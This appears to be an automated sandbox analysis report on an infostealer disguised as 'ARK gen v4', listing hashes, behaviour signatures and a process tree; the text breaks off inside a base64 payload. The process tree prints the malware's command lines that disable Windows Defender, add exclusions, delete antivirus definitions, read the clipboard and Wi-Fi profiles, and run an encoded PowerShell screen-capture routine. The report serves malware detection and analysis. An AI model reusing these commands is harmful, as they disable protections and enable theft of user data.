Analysis
-
max time kernel
63s -
max time network
64s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
21-12-2024 16:52
Behavioral task
behavioral1
Sample
ARK Premium v4.rar
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral2
Sample
ARK gen v4.exe
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral3
Sample
8#��~�.pyc
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral4
Sample
README.txt
Resource
win10ltsc2021-20241211-en
General
-
Target
ARK Premium v4.rar
-
Size
5.8MB
-
MD5
8abd344b753f238eb81d0b5d0208f23a
-
SHA1
149cbd47c701cc97458f867ebf09831190d705b9
-
SHA256
4461c776b98997d20667083d19db07e892884b42410a3a4a2272a4559319d83d
-
SHA512
8fe93569280d1929e93abe2428bed791dc78e8ab3703c53f2edd13d48c40a314f76a502f32fa3f2c0fd42cbfa89aa7d96ab3c877eb767b468e3727d860dd28d8
-
SSDEEP
98304:2C6P7J6VKaHgQZtsUzzeQ45d7vVViohBmE2Rx3O61hiMFdWmEOQ/+Nzh+zs2EVvZ:KJ6ZgQZtsUziQ45dzfiohw9BDriM8OQ6
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 4016 MpCmdRun.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 676 powershell.exe 4984 powershell.exe 3848 powershell.exe 3556 powershell.exe 4324 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts ARK gen v4.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 1516 cmd.exe 4744 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 1888 ARK gen v4.exe 1984 ARK gen v4.exe 2864 rar.exe -
Loads dropped DLL 16 IoCs
pid Process 1984 ARK gen v4.exe 1984 ARK gen v4.exe 1984 ARK gen v4.exe 1984 ARK gen v4.exe 1984 ARK gen v4.exe 1984 ARK gen v4.exe 1984 ARK gen v4.exe 1984 ARK gen v4.exe 1984 ARK gen v4.exe 1984 ARK gen v4.exe 1984 ARK gen v4.exe 1984 ARK gen v4.exe 1984 ARK gen v4.exe 1984 ARK gen v4.exe 1984 ARK gen v4.exe 1984 ARK gen v4.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 38 discord.com 39 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 36 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 2044 tasklist.exe 2552 tasklist.exe 3708 tasklist.exe 4416 tasklist.exe -
resource yara_rule behavioral1/files/0x0029000000046277-44.dat upx behavioral1/memory/1984-48-0x00007FFEFF430000-0x00007FFEFF896000-memory.dmp upx behavioral1/files/0x0036000000046257-50.dat upx behavioral1/files/0x0029000000046275-54.dat upx behavioral1/memory/1984-53-0x00007FFF0E590000-0x00007FFF0E5B4000-memory.dmp upx behavioral1/memory/1984-71-0x00007FFF0EEB0000-0x00007FFF0EEBF000-memory.dmp upx behavioral1/files/0x0026000000046271-70.dat upx behavioral1/files/0x0026000000046270-69.dat upx behavioral1/files/0x002600000004626f-68.dat upx behavioral1/files/0x002600000004626e-67.dat upx behavioral1/files/0x0026000000046262-66.dat upx behavioral1/files/0x002600000004625e-65.dat upx behavioral1/files/0x002600000004625d-64.dat upx behavioral1/files/0x002c000000046256-63.dat upx behavioral1/files/0x0028000000046284-62.dat upx behavioral1/files/0x0028000000046283-61.dat upx behavioral1/files/0x0028000000046282-60.dat upx behavioral1/files/0x0029000000046276-57.dat upx behavioral1/files/0x0029000000046274-56.dat upx behavioral1/memory/1984-77-0x00007FFF00C20000-0x00007FFF00C4C000-memory.dmp upx behavioral1/memory/1984-79-0x00007FFF0DF60000-0x00007FFF0DF78000-memory.dmp upx behavioral1/memory/1984-81-0x00007FFF034E0000-0x00007FFF034FF000-memory.dmp upx behavioral1/memory/1984-83-0x00007FFEFF2B0000-0x00007FFEFF42D000-memory.dmp upx behavioral1/memory/1984-85-0x00007FFF00C00000-0x00007FFF00C19000-memory.dmp upx behavioral1/memory/1984-89-0x00007FFEFF990000-0x00007FFEFF9BE000-memory.dmp upx behavioral1/memory/1984-88-0x00007FFF0EDD0000-0x00007FFF0EDDD000-memory.dmp upx behavioral1/memory/1984-90-0x00007FFEFF430000-0x00007FFEFF896000-memory.dmp upx behavioral1/memory/1984-95-0x00007FFF0E590000-0x00007FFF0E5B4000-memory.dmp upx behavioral1/memory/1984-94-0x00007FFEFF1F0000-0x00007FFEFF2A8000-memory.dmp upx behavioral1/memory/1984-93-0x00007FFEFEE70000-0x00007FFEFF1E5000-memory.dmp upx behavioral1/memory/1984-97-0x00007FFEFF970000-0x00007FFEFF985000-memory.dmp upx behavioral1/memory/1984-100-0x00007FFF0EA30000-0x00007FFF0EA3D000-memory.dmp upx behavioral1/memory/1984-99-0x00007FFF00C20000-0x00007FFF00C4C000-memory.dmp upx behavioral1/memory/1984-105-0x00007FFEFED50000-0x00007FFEFEE68000-memory.dmp upx behavioral1/memory/1984-104-0x00007FFF0DF60000-0x00007FFF0DF78000-memory.dmp upx behavioral1/memory/1984-196-0x00007FFF034E0000-0x00007FFF034FF000-memory.dmp upx behavioral1/memory/1984-219-0x00007FFEFF2B0000-0x00007FFEFF42D000-memory.dmp upx behavioral1/memory/1984-263-0x00007FFF00C00000-0x00007FFF00C19000-memory.dmp upx behavioral1/memory/1984-304-0x00007FFEFF990000-0x00007FFEFF9BE000-memory.dmp upx behavioral1/memory/1984-306-0x00007FFEFEE70000-0x00007FFEFF1E5000-memory.dmp upx behavioral1/memory/1984-307-0x00007FFEFF1F0000-0x00007FFEFF2A8000-memory.dmp upx behavioral1/memory/1984-320-0x00007FFEFF430000-0x00007FFEFF896000-memory.dmp upx behavioral1/memory/1984-335-0x00007FFEFF970000-0x00007FFEFF985000-memory.dmp upx behavioral1/memory/1984-326-0x00007FFEFF2B0000-0x00007FFEFF42D000-memory.dmp upx behavioral1/memory/1984-325-0x00007FFF034E0000-0x00007FFF034FF000-memory.dmp upx behavioral1/memory/1984-333-0x00007FFF0EA30000-0x00007FFF0EA3D000-memory.dmp upx behavioral1/memory/1984-321-0x00007FFF0E590000-0x00007FFF0E5B4000-memory.dmp upx behavioral1/memory/1984-356-0x00007FFEFF430000-0x00007FFEFF896000-memory.dmp upx behavioral1/memory/1984-379-0x00007FFF0EDD0000-0x00007FFF0EDDD000-memory.dmp upx behavioral1/memory/1984-378-0x00007FFF00C00000-0x00007FFF00C19000-memory.dmp upx behavioral1/memory/1984-377-0x00007FFEFF2B0000-0x00007FFEFF42D000-memory.dmp upx behavioral1/memory/1984-376-0x00007FFF034E0000-0x00007FFF034FF000-memory.dmp upx behavioral1/memory/1984-375-0x00007FFF0DF60000-0x00007FFF0DF78000-memory.dmp upx behavioral1/memory/1984-374-0x00007FFF00C20000-0x00007FFF00C4C000-memory.dmp upx behavioral1/memory/1984-373-0x00007FFF0EEB0000-0x00007FFF0EEBF000-memory.dmp upx behavioral1/memory/1984-372-0x00007FFF0E590000-0x00007FFF0E5B4000-memory.dmp upx behavioral1/memory/1984-371-0x00007FFEFF990000-0x00007FFEFF9BE000-memory.dmp upx behavioral1/memory/1984-369-0x00007FFF0EA30000-0x00007FFF0EA3D000-memory.dmp upx behavioral1/memory/1984-368-0x00007FFEFF970000-0x00007FFEFF985000-memory.dmp upx behavioral1/memory/1984-367-0x00007FFEFF1F0000-0x00007FFEFF2A8000-memory.dmp upx behavioral1/memory/1984-366-0x00007FFEFEE70000-0x00007FFEFF1E5000-memory.dmp upx behavioral1/memory/1984-370-0x00007FFEFED50000-0x00007FFEFEE68000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4760 cmd.exe 4776 netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 5068 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 3784 systeminfo.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2934520114-3201407646-466687995-1000_Classes\Local Settings 7zFM.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 4016 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 52 IoCs
pid Process 1552 7zFM.exe 1552 7zFM.exe 676 powershell.exe 676 powershell.exe 4984 powershell.exe 4984 powershell.exe 3848 powershell.exe 3848 powershell.exe 4732 WMIC.exe 4732 WMIC.exe 4732 WMIC.exe 4732 WMIC.exe 4984 powershell.exe 4984 powershell.exe 676 powershell.exe 676 powershell.exe 4744 powershell.exe 4744 powershell.exe 3848 powershell.exe 3848 powershell.exe 4744 powershell.exe 4124 powershell.exe 4124 powershell.exe 4124 powershell.exe 3556 powershell.exe 3556 powershell.exe 3556 powershell.exe 2908 powershell.exe 2908 powershell.exe 2908 powershell.exe 2792 WMIC.exe 2792 WMIC.exe 2792 WMIC.exe 2792 WMIC.exe 1544 WMIC.exe 1544 WMIC.exe 1544 WMIC.exe 1544 WMIC.exe 2036 WMIC.exe 2036 WMIC.exe 2036 WMIC.exe 2036 WMIC.exe 4324 powershell.exe 4324 powershell.exe 5068 WMIC.exe 5068 WMIC.exe 5068 WMIC.exe 5068 WMIC.exe 3972 powershell.exe 3972 powershell.exe 1552 7zFM.exe 1552 7zFM.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1552 7zFM.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 1552 7zFM.exe Token: 35 1552 7zFM.exe Token: SeSecurityPrivilege 1552 7zFM.exe Token: SeSecurityPrivilege 1552 7zFM.exe Token: SeDebugPrivilege 676 powershell.exe Token: SeDebugPrivilege 4984 powershell.exe Token: SeDebugPrivilege 3848 powershell.exe Token: SeDebugPrivilege 2044 tasklist.exe Token: SeDebugPrivilege 2552 tasklist.exe Token: SeIncreaseQuotaPrivilege 4732 WMIC.exe Token: SeSecurityPrivilege 4732 WMIC.exe Token: SeTakeOwnershipPrivilege 4732 WMIC.exe Token: SeLoadDriverPrivilege 4732 WMIC.exe Token: SeSystemProfilePrivilege 4732 WMIC.exe Token: SeSystemtimePrivilege 4732 WMIC.exe Token: SeProfSingleProcessPrivilege 4732 WMIC.exe Token: SeIncBasePriorityPrivilege 4732 WMIC.exe Token: SeCreatePagefilePrivilege 4732 WMIC.exe Token: SeBackupPrivilege 4732 WMIC.exe Token: SeRestorePrivilege 4732 WMIC.exe Token: SeShutdownPrivilege 4732 WMIC.exe Token: SeDebugPrivilege 4732 WMIC.exe Token: SeSystemEnvironmentPrivilege 4732 WMIC.exe Token: SeRemoteShutdownPrivilege 4732 WMIC.exe Token: SeUndockPrivilege 4732 WMIC.exe Token: SeManageVolumePrivilege 4732 WMIC.exe Token: 33 4732 WMIC.exe Token: 34 4732 WMIC.exe Token: 35 4732 WMIC.exe Token: 36 4732 WMIC.exe Token: SeDebugPrivilege 4744 powershell.exe Token: SeDebugPrivilege 3708 tasklist.exe Token: SeIncreaseQuotaPrivilege 4732 WMIC.exe Token: SeSecurityPrivilege 4732 WMIC.exe Token: SeTakeOwnershipPrivilege 4732 WMIC.exe Token: SeLoadDriverPrivilege 4732 WMIC.exe Token: SeSystemProfilePrivilege 4732 WMIC.exe Token: SeSystemtimePrivilege 4732 WMIC.exe Token: SeProfSingleProcessPrivilege 4732 WMIC.exe Token: SeIncBasePriorityPrivilege 4732 WMIC.exe Token: SeCreatePagefilePrivilege 4732 WMIC.exe Token: SeBackupPrivilege 4732 WMIC.exe Token: SeRestorePrivilege 4732 WMIC.exe Token: SeShutdownPrivilege 4732 WMIC.exe Token: SeDebugPrivilege 4732 WMIC.exe Token: SeSystemEnvironmentPrivilege 4732 WMIC.exe Token: SeRemoteShutdownPrivilege 4732 WMIC.exe Token: SeUndockPrivilege 4732 WMIC.exe Token: SeManageVolumePrivilege 4732 WMIC.exe Token: 33 4732 WMIC.exe Token: 34 4732 WMIC.exe Token: 35 4732 WMIC.exe Token: 36 4732 WMIC.exe Token: SeDebugPrivilege 4124 powershell.exe Token: SeIncreaseQuotaPrivilege 4984 powershell.exe Token: SeSecurityPrivilege 4984 powershell.exe Token: SeTakeOwnershipPrivilege 4984 powershell.exe Token: SeLoadDriverPrivilege 4984 powershell.exe Token: SeSystemProfilePrivilege 4984 powershell.exe Token: SeSystemtimePrivilege 4984 powershell.exe Token: SeProfSingleProcessPrivilege 4984 powershell.exe Token: SeIncBasePriorityPrivilege 4984 powershell.exe Token: SeCreatePagefilePrivilege 4984 powershell.exe Token: SeBackupPrivilege 4984 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 1552 7zFM.exe 1552 7zFM.exe 1552 7zFM.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1552 wrote to memory of 4016 1552 7zFM.exe 90 PID 1552 wrote to memory of 4016 1552 7zFM.exe 90 PID 1552 wrote to memory of 1888 1552 7zFM.exe 91 PID 1552 wrote to memory of 1888 1552 7zFM.exe 91 PID 1888 wrote to memory of 1984 1888 ARK gen v4.exe 93 PID 1888 wrote to memory of 1984 1888 ARK gen v4.exe 93 PID 1984 wrote to memory of 4544 1984 ARK gen v4.exe 94 PID 1984 wrote to memory of 4544 1984 ARK gen v4.exe 94 PID 1984 wrote to memory of 3776 1984 ARK gen v4.exe 95 PID 1984 wrote to memory of 3776 1984 ARK gen v4.exe 95 PID 1984 wrote to memory of 3124 1984 ARK gen v4.exe 97 PID 1984 wrote to memory of 3124 1984 ARK gen v4.exe 97 PID 4544 wrote to memory of 4984 4544 cmd.exe 100 PID 4544 wrote to memory of 4984 4544 cmd.exe 100 PID 3776 wrote to memory of 3848 3776 cmd.exe 101 PID 3776 wrote to memory of 3848 3776 cmd.exe 101 PID 3124 wrote to memory of 676 3124 cmd.exe 102 PID 3124 wrote to memory of 676 3124 cmd.exe 102 PID 1984 wrote to memory of 1020 1984 ARK gen v4.exe 103 PID 1984 wrote to memory of 1020 1984 ARK gen v4.exe 103 PID 1984 wrote to memory of 1140 1984 ARK gen v4.exe 104 PID 1984 wrote to memory of 1140 1984 ARK gen v4.exe 104 PID 1984 wrote to memory of 4660 1984 ARK gen v4.exe 107 PID 1984 wrote to memory of 4660 1984 ARK gen v4.exe 107 PID 1140 wrote to memory of 2044 1140 cmd.exe 108 PID 1140 wrote to memory of 2044 1140 cmd.exe 108 PID 1984 wrote to memory of 1516 1984 ARK gen v4.exe 110 PID 1984 wrote to memory of 1516 1984 ARK gen v4.exe 110 PID 1020 wrote to memory of 2552 1020 cmd.exe 111 PID 1020 wrote to memory of 2552 1020 cmd.exe 111 PID 1984 wrote to memory of 4948 1984 ARK gen v4.exe 113 PID 1984 wrote to memory of 4948 1984 ARK gen v4.exe 113 PID 1984 wrote to memory of 472 1984 ARK gen v4.exe 114 PID 1984 wrote to memory of 472 1984 ARK gen v4.exe 114 PID 1984 wrote to memory of 4760 1984 ARK gen v4.exe 154 PID 1984 wrote to memory of 4760 1984 ARK gen v4.exe 154 PID 1984 wrote to memory of 1832 1984 ARK gen v4.exe 118 PID 1984 wrote to memory of 1832 1984 ARK gen v4.exe 118 PID 1516 wrote to memory of 4744 1516 cmd.exe 120 PID 1516 wrote to memory of 4744 1516 cmd.exe 120 PID 1984 wrote to memory of 1524 1984 ARK gen v4.exe 121 PID 1984 wrote to memory of 1524 1984 ARK gen v4.exe 121 PID 4660 wrote to memory of 4732 4660 cmd.exe 125 PID 4660 wrote to memory of 4732 4660 cmd.exe 125 PID 1984 wrote to memory of 3680 1984 ARK gen v4.exe 122 PID 1984 wrote to memory of 3680 1984 ARK gen v4.exe 122 PID 4948 wrote to memory of 3708 4948 cmd.exe 127 PID 4948 wrote to memory of 3708 4948 cmd.exe 127 PID 472 wrote to memory of 3148 472 cmd.exe 128 PID 472 wrote to memory of 3148 472 cmd.exe 128 PID 3680 wrote to memory of 4124 3680 cmd.exe 165 PID 3680 wrote to memory of 4124 3680 cmd.exe 165 PID 1832 wrote to memory of 3784 1832 cmd.exe 130 PID 1832 wrote to memory of 3784 1832 cmd.exe 130 PID 4760 wrote to memory of 4776 4760 cmd.exe 131 PID 4760 wrote to memory of 4776 4760 cmd.exe 131 PID 1524 wrote to memory of 32 1524 cmd.exe 156 PID 1524 wrote to memory of 32 1524 cmd.exe 156 PID 1984 wrote to memory of 3520 1984 ARK gen v4.exe 133 PID 1984 wrote to memory of 3520 1984 ARK gen v4.exe 133 PID 1984 wrote to memory of 3576 1984 ARK gen v4.exe 149 PID 1984 wrote to memory of 3576 1984 ARK gen v4.exe 149 PID 3520 wrote to memory of 1176 3520 cmd.exe 138 PID 3520 wrote to memory of 1176 3520 cmd.exe 138 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 1740 attrib.exe 4580 attrib.exe
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\ARK Premium v4.rar"1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO01608EB7\README.txt2⤵
- Opens file in notepad (likely ransom note)
PID:4016
-
-
C:\Users\Admin\AppData\Local\Temp\7zO016F3F58\ARK gen v4.exe"C:\Users\Admin\AppData\Local\Temp\7zO016F3F58\ARK gen v4.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Users\Admin\AppData\Local\Temp\7zO016F3F58\ARK gen v4.exe"C:\Users\Admin\AppData\Local\Temp\7zO016F3F58\ARK gen v4.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zO016F3F58\ARK gen v4.exe'"4⤵
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zO016F3F58\ARK gen v4.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵
- Suspicious use of WriteProcessMemory
PID:3776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3848
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All5⤵
- Deletes Windows Defender Definitions
PID:4016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"4⤵
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4744
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
- Suspicious use of WriteProcessMemory
PID:472 -
C:\Windows\system32\tree.comtree /A /F5⤵PID:3148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:3784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"4⤵
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath5⤵PID:32
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAI